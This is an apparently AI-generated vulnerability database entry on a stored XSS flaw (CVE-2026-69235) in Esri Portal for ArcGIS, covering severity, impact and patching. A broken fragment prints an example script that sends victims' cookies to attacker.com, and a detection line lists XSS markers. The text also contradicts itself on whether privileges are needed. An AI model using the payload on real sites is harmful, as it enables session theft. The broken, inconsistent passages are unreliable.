
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-69235 is a stored cross-site scripting (XSS) vulnerability in Esri Portal for ArcGIS that may allow a remote, privileged attacker to inject malicious code that executes in a victim's browser. It affects Portal for ArcGIS versions 11.1 through 11.5 (inclusive), with users on ArcGIS Enterprise 11.1, 11.3, and 11.5 specifically encouraged to patch. The vulnerability was published on August 21, 2026, by Esri (Environmental Systems Research Institute, Inc.) and carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Esri Blog).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. A privileged attacker can inject malicious JavaScript or HTML into the portal, which is then stored server-side and subsequently rendered in the browsers of other users who visit the affected portal pages. Exploitation requires user interaction (a victim must visit the page containing the injected payload) but does not require the attacker to have elevated privileges beyond initial portal access, and no special attack complexity is needed (GitHub Advisory, Esri Blog).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of other portal users, enabling theft of session cookies, credentials, or sensitive data visible to those users, as well as performing unauthorized actions on their behalf within the portal. The scope change in the CVSS vector indicates that the impact extends beyond the attacker's own session to affect other users' browser contexts. Availability is not directly impacted, but confidentiality and integrity are both assessed as low-level impacts per the CVSS scoring (GitHub Advisory).
There is no known public proof-of-concept exploit and no evidence of active in-the-wild exploitation at the time of publication (GitHub Advisory). The EPSS score is approximately 0.177% (8th percentile), indicating a low near-term probability of exploitation. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a portal field that is rendered without proper output encoding for other users.<script>, onerror=, javascript:) in user-controlled fields; repeated access to specific portal items by multiple distinct users followed by outbound connections.Esri recommends that all users upgrade to the latest long-term support release of ArcGIS Enterprise/Portal for ArcGIS. Users specifically running ArcGIS Enterprise versions 11.1, 11.3, and 11.5 are urged to apply the available security patches immediately. As a complementary measure, organizations should implement strict input validation and output encoding controls, restrict privileged portal user access to trusted individuals, and monitor portal activity for suspicious content submissions (Esri Blog, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."